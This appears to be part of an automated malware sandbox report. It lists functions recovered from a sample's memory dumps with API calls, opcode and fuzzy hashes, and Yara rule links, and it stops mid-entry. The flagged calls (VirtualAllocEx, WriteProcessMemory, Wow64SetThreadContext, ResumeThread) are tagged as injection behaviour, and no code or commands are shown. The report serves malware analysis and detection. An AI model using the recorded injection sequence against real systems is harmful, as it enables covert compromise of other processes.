                                    • Instruction ID: 7dd6c7238749cafbfbee9a81b17d016155975846da8e4817f16bf81fc55fbc75
                                    • Opcode Fuzzy Hash: 9a0929838e5732637a8369771d1fc8a3c357111caea6fde86d718974d447c081
                                    • Instruction Fuzzy Hash: DE91CD74D0426D8FCF21CFA4D880BEDBBB1AF4A304F1590AAE549B7251DB709A85CF94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00C293E8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 116injectionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 00C294BB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.688589259.0000000000C20000.00000040.00000001.sdmp, Offset: 00C20000, based on PE: false
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID: +S?
                                    • API String ID: 3559483778-2156307688
                                    • Opcode ID: e6506f72d4385a1a049179e141deece6ee734c47657145bff81e6d51c72448a0
                                    • Instruction ID: 90f7507a7ccabd87791a1a5952678605c91afb8ec83a83f36efcc954fd861bf8
                                    • Opcode Fuzzy Hash: e6506f72d4385a1a049179e141deece6ee734c47657145bff81e6d51c72448a0
                                    • Instruction Fuzzy Hash: BD41AAB4D052589FCF00CFA9D884ADEFBF1FB49314F10942AE814B7240D734AA45CB64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00C290F8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 105memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 00C291AA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.688589259.0000000000C20000.00000040.00000001.sdmp, Offset: 00C20000, based on PE: false
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: +S?
                                    • API String ID: 4275171209-2156307688
                                    • Opcode ID: d24093e347497b90ab5fb510ea9cc6353a35ed9a8e5a2fe142f94d37d7f4fc3f
                                    • Instruction ID: b945459c1df9c3b4b3306949f2fecf2c5abe7d678b802791d63c6828f7ff8308
                                    • Opcode Fuzzy Hash: d24093e347497b90ab5fb510ea9cc6353a35ed9a8e5a2fe142f94d37d7f4fc3f
                                    • Instruction Fuzzy Hash: 4D41B7B8D042589FCF10CFA9E884AEEFBB0BB49310F10942AE815B7240D735A902CF55
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00C29100, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 101memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 00C291AA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.688589259.0000000000C20000.00000040.00000001.sdmp, Offset: 00C20000, based on PE: false
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: +S?
                                    • API String ID: 4275171209-2156307688
                                    • Opcode ID: e6daf5fdbbb561594411350254fc6ccf6c158b1b6b5d980eea6377c33f99056b
                                    • Instruction ID: 47e7e6750b284c7213ed73fe1e267642c2b78c6b12095cf85e335e09dda5280d
                                    • Opcode Fuzzy Hash: e6daf5fdbbb561594411350254fc6ccf6c158b1b6b5d980eea6377c33f99056b
                                    • Instruction Fuzzy Hash: D03197B9D042589BCF10CFA9E884A9EFBB1FB49310F10A42AE915B7200D735A946CF65
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0038FA28, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 0038FAD7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.683894813.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID: +S?
                                    • API String ID: 544645111-2156307688
                                    • Opcode ID: 230b642fe62e9ef8443f42bcb9f45400db33196da21e8afc8387ec43e555108f
                                    • Instruction ID: 15cba958a00e675ecc6263a66f52be7bdd3ad1408e88a75a6be37c85b839d413
                                    • Opcode Fuzzy Hash: 230b642fe62e9ef8443f42bcb9f45400db33196da21e8afc8387ec43e555108f
                                    • Instruction Fuzzy Hash: 023198B9D042589FCF10CFA9E484AEEFBB1BF49310F24906AE815B7210D375AA45CF64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00C244A9, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 00C24557
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.688589259.0000000000C20000.00000040.00000001.sdmp, Offset: 00C20000, based on PE: false
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID: +S?
                                    • API String ID: 544645111-2156307688
                                    • Opcode ID: ede435f230cd30555047137a2959cde60e64a3f3c9dd594b73e2fdb6c257232c
                                    • Instruction ID: a757e75d989d31deeb9dee17752b4febcd64715996beae3f83b364913d8e0b0a
                                    • Opcode Fuzzy Hash: ede435f230cd30555047137a2959cde60e64a3f3c9dd594b73e2fdb6c257232c
                                    • Instruction Fuzzy Hash: 45319AB9D042589FCF10CFA9E884ADEFBB0BB49310F14942AE964B7210D775AA45CF64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00C29830, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 00C298E7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.688589259.0000000000C20000.00000040.00000001.sdmp, Offset: 00C20000, based on PE: false
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID: +S?
                                    • API String ID: 983334009-2156307688
                                    • Opcode ID: 3f761dc6a785dd64d5c91b55e6774e70e10e19aed8bada378dcb2677bccbc9b1
                                    • Instruction ID: b68ea96cf5309716a0d83e87ed7b635512dd41885ed487cb253673aa084a88e8
                                    • Opcode Fuzzy Hash: 3f761dc6a785dd64d5c91b55e6774e70e10e19aed8bada378dcb2677bccbc9b1
                                    • Instruction Fuzzy Hash: 9F41CBB5D052589FCB10CFA9D884AEEFBF0BF49314F24842AE414B7240D778AA85CF54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0038FA30, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 94memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 0038FAD7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.683894813.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID: +S?
                                    • API String ID: 544645111-2156307688
                                    • Opcode ID: 3fbf748900ee96b9233fa6dc9155739568321e926512323479dbf529d591847d
                                    • Instruction ID: 52c283d4a40077fdd4a2874baca9d7372bf501cfcdbb2cf042d93f2ddd382ef6
                                    • Opcode Fuzzy Hash: 3fbf748900ee96b9233fa6dc9155739568321e926512323479dbf529d591847d
                                    • Instruction Fuzzy Hash: 303177B9D042589FCB10CFA9E884ADEFBB0BB49310F24946AE815B7210D775AA45CF64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00C244B0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 94memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 00C24557
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.688589259.0000000000C20000.00000040.00000001.sdmp, Offset: 00C20000, based on PE: false
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID: +S?
                                    • API String ID: 544645111-2156307688
                                    • Opcode ID: 6cbe2fbe309c9d5dc48e959e1ee3d20582c036f7da5382f3341c884b67b29e45
                                    • Instruction ID: 6243ca597990497fbc7c67bb86e4d2f87c4053470143e3e94ef0158bcb9212b6
                                    • Opcode Fuzzy Hash: 6cbe2fbe309c9d5dc48e959e1ee3d20582c036f7da5382f3341c884b67b29e45
                                    • Instruction Fuzzy Hash: F13179B9D042589FCF14CFA9E484ADEFBB0BB49310F24942AE824B7210D375AA45CF64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00C29838, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 94threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 00C298E7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.688589259.0000000000C20000.00000040.00000001.sdmp, Offset: 00C20000, based on PE: false
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID: +S?
                                    • API String ID: 983334009-2156307688
                                    • Opcode ID: 77a29e75e4579893d92ef3053f1dda1e363e43feb6b934eebaef1b2deb3a2f68
                                    • Instruction ID: 6553c3f875065d7ec4e5fb5802976ed4cc73cc29f619169c432e3175614c2134
                                    • Opcode Fuzzy Hash: 77a29e75e4579893d92ef3053f1dda1e363e43feb6b934eebaef1b2deb3a2f68
                                    • Instruction Fuzzy Hash: 4031ABB5D052589FCB10DFAAD884AEEBBF0BB49314F24842AE414B7240D779AA85CF54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00383158, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 86fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.683894813.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false
                                    Similarity
                                    • API ID: DeleteFile
                                    • String ID: +S?
                                    • API String ID: 4033686569-2156307688
                                    • Opcode ID: 3471a4c6bf759ce00e0315bbb77a820285de862fda66f6a27b39ab0dff1ce8df
                                    • Instruction ID: e3dbc50391db791b7566069c6806d4e99aeced3d59b81918da38553266b5bdea
                                    • Opcode Fuzzy Hash: 3471a4c6bf759ce00e0315bbb77a820285de862fda66f6a27b39ab0dff1ce8df
                                    • Instruction Fuzzy Hash: 4731BBB4D052189FCB11CFA9D884AEEFBF5BB49314F14846AE814B7350D374AA45CBA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00C29A90, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 73threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.688589259.0000000000C20000.00000040.00000001.sdmp, Offset: 00C20000, based on PE: false
                                    Similarity
                                    • API ID: ResumeThread
                                    • String ID: +S?
                                    • API String ID: 947044025-2156307688
                                    • Opcode ID: 4f00009937d7cc9501cb1af6aba187a79884dd624b2546cadf58ce33a75a6665
                                    • Instruction ID: 0a75cfdc64f9a0cb4369e0a0ef22a46875d153a691084167ef9a62426d00ce0a
                                    • Opcode Fuzzy Hash: 4f00009937d7cc9501cb1af6aba187a79884dd624b2546cadf58ce33a75a6665
                                    • Instruction Fuzzy Hash: 0931CAB4D052589FCF10CFAAE884AAEFBB0EF49314F10942AE914B7300D734A901CFA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00560DB9, Relevance: .1, Instructions: 55COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.684811932.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 68cba2fe161ed08254f3687846ffa9f3d1e851165561caa26ebeb07958098c82
                                    • Instruction ID: 023affd604e0ee48ef7c3cf4bbb83ee87c4475a9ff2bace5c31f548ca9b9dab9
                                    • Opcode Fuzzy Hash: 68cba2fe161ed08254f3687846ffa9f3d1e851165561caa26ebeb07958098c82
                                    • Instruction Fuzzy Hash: 3811CE3580E2889FC712CBB49C146AE7FB4AF06316F1502DBE409D72E2E6754D08CB52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0015D295, Relevance: .0, Instructions: 45COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.682642281.000000000015D000.00000040.00000001.sdmp, Offset: 0015D000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3449026908ccbaa721f4d31a3a2a9b416ade60578ccc5b9e3011778d5f7de16a
                                    • Instruction ID: efdbbe7e4d60c314d29357092a2d821abe790e148bb53bc42a7a66f568de4c46
                                    • Opcode Fuzzy Hash: 3449026908ccbaa721f4d31a3a2a9b416ade60578ccc5b9e3011778d5f7de16a
                                    • Instruction Fuzzy Hash: E001A27100C340DAE7309A26E884B67FB98EF51725F19845AEE255E286C379EC48C7B2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00561875, Relevance: .0, Instructions: 36COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.684811932.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7d49271b0dd2a590ad9ce5e53bc6a399838071537a8920c59585b01e59405590
                                    • Instruction ID: 774ba9f66365b96fa4fc5cde647ec901daf1afb0b9db0b603e4ccac2baf6f64e
                                    • Opcode Fuzzy Hash: 7d49271b0dd2a590ad9ce5e53bc6a399838071537a8920c59585b01e59405590
                                    • Instruction Fuzzy Hash: 7CF0823054E3C89FC352CB74AC54DAABF74AF47206B1941DBE449DB2B3C6254D18CBA6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0015D294, Relevance: .0, Instructions: 36COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.682642281.000000000015D000.00000040.00000001.sdmp, Offset: 0015D000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c9e9ef0f31087358ba0c78ec71c6d3e14642f4892432d7a7efa0a25a9e95df76
                                    • Instruction ID: 3911da9f9b331cf67fa43bad3d9f03ff3f208635a039336819b589ba2f0b7450
                                    • Opcode Fuzzy Hash: c9e9ef0f31087358ba0c78ec71c6d3e14642f4892432d7a7efa0a25a9e95df76
                                    • Instruction Fuzzy Hash: D6F062714087409EE7208E19D884B66FF98EB51724F18C45AED285F287C378AC44CBB2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00560CE1, Relevance: .0, Instructions: 34COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.684811932.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 097f9330bfdb255ba258da84e749b8e1fe9ab2f407f8ad592a77fe51b33fd33d
                                    • Instruction ID: aa45335bdf1572f0e9afb3f0471cd64734514dfb6eee6616587c12b28c539cf1
                                    • Opcode Fuzzy Hash: 097f9330bfdb255ba258da84e749b8e1fe9ab2f407f8ad592a77fe51b33fd33d
                                    • Instruction Fuzzy Hash: DCF09A35809288EFCB01CFA4D8889CABF70EF1B315F1481DAE84467262C6304A14DB92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00561455, Relevance: .0, Instructions: 32COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.684811932.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: acdc860ef38bd42285fb8a9db0d1f19f81ef8b25ad0f65c1b09612624f5fb7bd
                                    • Instruction ID: d59c7390d6358191e3958df89cad9109f7dcd1507038962e9c3db8b27c937d51
                                    • Opcode Fuzzy Hash: acdc860ef38bd42285fb8a9db0d1f19f81ef8b25ad0f65c1b09612624f5fb7bd
                                    • Instruction Fuzzy Hash: 81F0963485E3849FC792DFB4D8549D97FB4AF07302F1901DAD945C7262E6304918DB62
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0056133D, Relevance: .0, Instructions: 32COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.684811932.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e77a2d59ad6e1692a96119771447d3c39ce267e34cd3a8e288f3e6ae352350c0
                                    • Instruction ID: 33b632319108e85a9f1afb99c2825337c1f659ffefa4bfc9a5ebcc3eacdb32ee
                                    • Opcode Fuzzy Hash: e77a2d59ad6e1692a96119771447d3c39ce267e34cd3a8e288f3e6ae352350c0
                                    • Instruction Fuzzy Hash: BB01313490A388AFCB02DFA8C854A9DBFB0EF1A305F0581DAE484D7262D2348A18DB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0056194D, Relevance: .0, Instructions: 30COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.684811932.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 640c903b5b644992b740106527b005cef6b774914e15b07eb2304c318beb8e7a
                                    • Instruction ID: fcfe0acfd010580eb950b4c9f830492473ef65810d140df9554dc64efad04f77
                                    • Opcode Fuzzy Hash: 640c903b5b644992b740106527b005cef6b774914e15b07eb2304c318beb8e7a
                                    • Instruction Fuzzy Hash: 27F0823484E3C49FC7569BB44D116ADBFB4EF07205F1541EBD884D72A2D2344A09DB62
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 005613C9, Relevance: .0, Instructions: 30COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.684811932.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6382ff5f525dec2bc07a8155641b95e331abddcd6d31967a730587c2650b4435
                                    • Instruction ID: 98684391e47b514e465cc3b80c6f67faa5af9e138beedd5d2d08f98cd635f7dc
                                    • Opcode Fuzzy Hash: 6382ff5f525dec2bc07a8155641b95e331abddcd6d31967a730587c2650b4435
                                    • Instruction Fuzzy Hash: FBF04475E093889FCB06CFA8985499CBFB0AF1A306F0542DAE485D7372D2308A08CB12
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 005617E9, Relevance: .0, Instructions: 30COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.684811932.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 880a5235fb549101d991e406454ef9148fb1e27210431166419d9286416e346c
                                    • Instruction ID: 52df9314012823aff0272724fd95ee1915e9b5fa393edf453a353ea82c746fba
                                    • Opcode Fuzzy Hash: 880a5235fb549101d991e406454ef9148fb1e27210431166419d9286416e346c
                                    • Instruction Fuzzy Hash: 75F0903580E3849FCB02DFB4D81499DBF70AF17321F0542CAE4949B2B2C2318958DB96
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00560881, Relevance: .0, Instructions: 30COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.684811932.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 57f369cf60785170f5b8a5a880436dc38294c52f9a51df65751682cd5464df4a
                                    • Instruction ID: a74aac6e3a1cf07e61c5b27ea2385f6e28db1955b046ad3e86dec0d13fa1226b
                                    • Opcode Fuzzy Hash: 57f369cf60785170f5b8a5a880436dc38294c52f9a51df65751682cd5464df4a
                                    • Instruction Fuzzy Hash: B0F0903480D3849FC742DFA4CC54D897F71AF1B311F1981DAE4459B2B3C2354918DB56
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0056156D, Relevance: .0, Instructions: 29COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.684811932.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 80ce3e9593c76c7e9e89d7d471bb246c4e5bd5594f2665af800685a815286b7d
                                    • Instruction ID: f9a93b992db42226933409494a38d98997c8c461a7dcf5e2102ca5558baa4f5e
                                    • Opcode Fuzzy Hash: 80ce3e9593c76c7e9e89d7d471bb246c4e5bd5594f2665af800685a815286b7d
                                    • Instruction Fuzzy Hash: 61F03075C09348AFCB02DFB4980069DBFB0AF56305F1581EAD844E7351D2358918CF52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00560FA9, Relevance: .0, Instructions: 29COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.684811932.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5fd3f2100206614e4a25fd02e96f91a7f2b15fb6cb052075f9237f98861a4756
                                    • Instruction ID: 1bdc44d3341e25bb0efca389a023d2b13f665487b4f2a1aed445a7cfc1dc443a
                                    • Opcode Fuzzy Hash: 5fd3f2100206614e4a25fd02e96f91a7f2b15fb6cb052075f9237f98861a4756
                                    • Instruction Fuzzy Hash: 32F01D34909384DFC742CFA89954AD9BFB0EF06205F0990EAD884DB3A3D2348904DF51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 005615F9, Relevance: .0, Instructions: 27COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.684811932.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cc2fa22d36c62cc7b2a61e5474b31e1896f25ce8517979315ab58c9e4dd87a63
                                    • Instruction ID: 53ca85360195c30dc94d3bad8ac86765e45ad18c57e0d4d085299314a78d08d1
                                    • Opcode Fuzzy Hash: cc2fa22d36c62cc7b2a61e5474b31e1896f25ce8517979315ab58c9e4dd87a63
                                    • Instruction Fuzzy Hash: E5F0303484F3C49FC7168BB49D2059D7F70AF53205F5A01DFD485E76A2D2344A48CB52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00560D6D, Relevance: .0, Instructions: 24COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.684811932.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4e712e6fe6395ff60fd0d3cd47ff737ff9d200b8d9d23eb87285074decd1473e
                                    • Instruction ID: 33cdf25dc9edbab308435edaa3ab767f919eda9555bce706e7355dd59c8e1014
                                    • Opcode Fuzzy Hash: 4e712e6fe6395ff60fd0d3cd47ff737ff9d200b8d9d23eb87285074decd1473e
                                    • Instruction Fuzzy Hash: F2E09A3980F3889FC7128BB49D107AE7F749F03219F0503DAC015872E2D6794848CB66
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00561358, Relevance: .0, Instructions: 22COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.684811932.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 28cb37fdddb8983c68d9596fbad6eda4f45a8d4f75174584791f5395a8154908
                                    • Instruction ID: c68d644d87025bfcd235597c0b56ef6863662df7362e4312c8caf7c7b2bc64af
                                    • Opcode Fuzzy Hash: 28cb37fdddb8983c68d9596fbad6eda4f45a8d4f75174584791f5395a8154908
                                    • Instruction Fuzzy Hash: 85F0A538A04208EFCB44DFA8D544A9CBBF4FB48301F1080A9E949A7320D6319A54DF45
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00560FC8, Relevance: .0, Instructions: 20COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.684811932.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 51382a56b3cb9fd5991b8322d2b433b45f3e4f46f27058e5c18e6d9a9e9b31b8
                                    • Instruction ID: 46156bbe4aff01ec7486b8c3f877dbab7bcf82ac05ab2a0b576411e54a20d1ad
                                    • Opcode Fuzzy Hash: 51382a56b3cb9fd5991b8322d2b433b45f3e4f46f27058e5c18e6d9a9e9b31b8
                                    • Instruction Fuzzy Hash: F9E0E538E04208EFCB44DFA9D545A9DFBF4FB48305F1080A9E80893361D6309A00CF81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 005613E8, Relevance: .0, Instructions: 20COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.684811932.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c54fd30fa90757fac66704d8421899b902db62e055db56d0c43ab1bb086ed614
                                    • Instruction ID: 44183d98e8c68ddf32efe65718b21f361bc853b8ec3a20d3acaaf05e3ebef04d
                                    • Opcode Fuzzy Hash: c54fd30fa90757fac66704d8421899b902db62e055db56d0c43ab1bb086ed614
                                    • Instruction Fuzzy Hash: EDE0E538E04208EFCB44DFA9D44469CBBF4FB49306F1080A9E80993320D6305A40DF81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00561588, Relevance: .0, Instructions: 20COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.684811932.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f3084ede39c8611a7d5fad190d3c758b1934eadb04b1f5e05054b1162ea5bf1b
                                    • Instruction ID: 53aaa394f55f6714eb484832a2e398b3552e3fdab6f4611d7eaf782743a24fab
                                    • Opcode Fuzzy Hash: f3084ede39c8611a7d5fad190d3c758b1934eadb04b1f5e05054b1162ea5bf1b
                                    • Instruction Fuzzy Hash: 54E01274D04208EFCB04EFA8D4006ADFBF5FB48305F1080AAE908A3310E7399A54DF95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00560D00, Relevance: .0, Instructions: 19COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.684811932.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7756ac294a1b791950cc97b3bf9fc72ffaff4a184b16193194b858a9b740993d
                                    • Instruction ID: 5d3a6e92b785723553ee3e694ca0a54e9098e772e91e7048b674bdcf80e02f01
                                    • Opcode Fuzzy Hash: 7756ac294a1b791950cc97b3bf9fc72ffaff4a184b16193194b858a9b740993d
                                    • Instruction Fuzzy Hash: 3AE04638904208EFCB04EFA8D844A9DBBB4FF09312F1081A8F90827360C731AE54EB95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00561808, Relevance: .0, Instructions: 19COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.684811932.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7756ac294a1b791950cc97b3bf9fc72ffaff4a184b16193194b858a9b740993d
                                    • Instruction ID: bbc0dc5dfe0fc908a76be175871acc32269d0a1005220fecb75c88b50f8a8c17
                                    • Opcode Fuzzy Hash: 7756ac294a1b791950cc97b3bf9fc72ffaff4a184b16193194b858a9b740993d
                                    • Instruction Fuzzy Hash: 1BE04F38904208EFCB04DFA4D84499CBBB5FF09312F108098F90427320C7319E54DB95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 005608A0, Relevance: .0, Instructions: 19COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.684811932.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7756ac294a1b791950cc97b3bf9fc72ffaff4a184b16193194b858a9b740993d
                                    • Instruction ID: efcbd79780b70d292fd22038e53e17a8f87dd31f086ad69eb504254e2bbdab24
                                    • Opcode Fuzzy Hash: 7756ac294a1b791950cc97b3bf9fc72ffaff4a184b16193194b858a9b740993d
                                    • Instruction Fuzzy Hash: DAE04638904208EFCB04EFA4D844A9DBBB5FF09312F108098F90827360C731AE54EB95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00561470, Relevance: .0, Instructions: 18COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.684811932.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4690355becbc1b6a1de17e78b53c7cfbd7fc5b8c82f952c1ce37329ec35b8958
                                    • Instruction ID: 900918f46caca933cf8a3ff4a8339993a876c0a3e949a4e57c77c87359133976
